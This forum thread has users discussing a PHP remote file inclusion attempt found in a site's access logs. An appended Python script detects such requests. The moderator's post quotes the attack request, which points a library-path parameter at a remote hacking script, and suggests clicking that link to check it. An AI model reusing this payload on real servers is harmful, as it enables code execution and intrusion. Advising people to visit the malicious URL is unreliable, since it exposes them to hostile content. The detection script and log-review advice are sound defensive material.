
Thread: What a hack attempt looks like in your log files.

  1. #1
    MyWebs is offline Moderator

    I noticed today a very suspicious entry while viewing my log files and thought I would share it here so others might know what sort of thing to look out for. It's a good idea imo to click the link to make sure it didn't work too if you ever spot something like this. I could be wrong about this though. :/

    Host: 85.111.12.199

    //?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt???
    Http Code: 200 Date: Nov 09 08:56:25 Http Version: HTTP/1.1 Size in Bytes: 9413
    Referer: -
    Agent: Mozilla/5.0

    /Stats.php//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt???
    Http Code: 200 Date: Nov 09 08:56:28 Http Version: HTTP/1.1 Size in Bytes: 9137
    Referer: -
    Agent: Mozilla/5.0

    It didn't seem to work in this case but I did report this to www.fileave.com to get it removed from there because that file is quite obviously used for hacking if you were to have a look at it. And to the person's ISP as well. Sadly it's in Turkey and I doubt they will do much. Guess I will see if they respond back to me.

    When you look at your log files, you do do this every so often, right? If you see something like:
    //?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt??? for a requested URL, this should throw a red flag in your mind.

    Thankfully WHB has good security in place and this hacking attempt failed.
    I hope this helps others to know what sort of bad stuff to be on the lookout for.
    Thanks,
    MyWebs

  2. #2
    Tony is offline Bad Influence

    I have no idea what you're talking about. I mean,
    • why should this worry me if I did see it, and
    • why (and how?) would I be looking at log files?

  3. #3
    Colin is offline Wait, What?

    You should check the access logs on your server every once in a while, though one of the big problems is parsing and reading it correctly. Mostly what is needed when looking through the logs is attempts to access files which don't exist, that way you can figure out why and perhaps take corrective actions. In some cases, it's a bot probing for a file which is "a known security issue", especially with some of the software packages which are out there. So if you have, say a Jomba website, and you see a bunch of hits on particular INTERIOR files, with no referrer FROM YOUR SITE, then it's a hacking attempt.

    Interior file: File which is not called directly from the internets, usually it's a module which does something for the software package you are using.

  4. #4
    Alan B is offline Super Moderator

    I think it's safest to assume that there will be hacking attempts on all sites. Most of these attempts are automated, so they hit loads of sites very quickly. The goal must be not to try to monitor all attempts, which really is impossible, but, rather, to take all prudent security measures. That will ensure that the inevitable hack attempts will not succeed.

    You can't prevent hack attempts. You can prevent them from succeeding.
    I am not WHB staff and I am not paid.
    I provide help in these forums on my own time.
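
Added example, not part of any post in this thread: a small Python scan that flags the pattern from post #1, a query-string parameter whose value is itself a remote URL, including percent-encoded variants. The sample lines are constructed and assume Apache combined log format (the post shows a stats-panel view); only the first two request targets and their sizes come from the thread, and the function name is hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample (Apache combined format, year and timezone are assumptions;
# the 192.0.2.x / 203.0.113.x entries are invented for contrast).
# The first two request targets are the ones quoted in post #1.
SAMPLE_LOG = """\
85.111.12.199 - - [09/Nov/2008:08:56:25 -0800] "GET //?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt??? HTTP/1.1" 200 9413 "-" "Mozilla/5.0"
85.111.12.199 - - [09/Nov/2008:08:56:28 -0800] "GET /Stats.php//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt??? HTTP/1.1" 200 9137 "-" "Mozilla/5.0"
192.0.2.10 - - [09/Nov/2008:09:01:02 -0800] "GET /index.php?page=about HTTP/1.1" 200 5120 "http://www.example.com/" "Mozilla/5.0"
203.0.113.7 - - [09/Nov/2008:09:03:44 -0800] "GET /Stats.php?inc=hTTp%3A%2F%2Fexample.org%2Fx.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0"
192.0.2.10 - - [09/Nov/2008:09:05:10 -0800] "GET /images/logo.png HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/5.0"
"""

# host, method, request target, status, size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# a parameter value that starts with a URL scheme, in any letter case
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def find_remote_include_attempts(log_text):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        host, _method, target, status, size = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                findings.append({"host": host, "path": path, "param": name,
                                 "value": value, "status": int(status),
                                 "size": int(size) if size.isdigit() else None})
    return findings


if __name__ == "__main__":
    for f in find_remote_include_attempts(SAMPLE_LOG):
        # A 200 only means the server answered; compare the size with a normal
        # hit on the same page before deciding whether the request had any effect.
        print(f"{f['host']} {f['path']} {f['param']}={f['value']} "
              f"status={f['status']} size={f['size']}")
```

A legitimate parameter that carries a full URL (a redirect target, for example) will also be flagged, so treat hits as leads to review rather than confirmed attacks.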
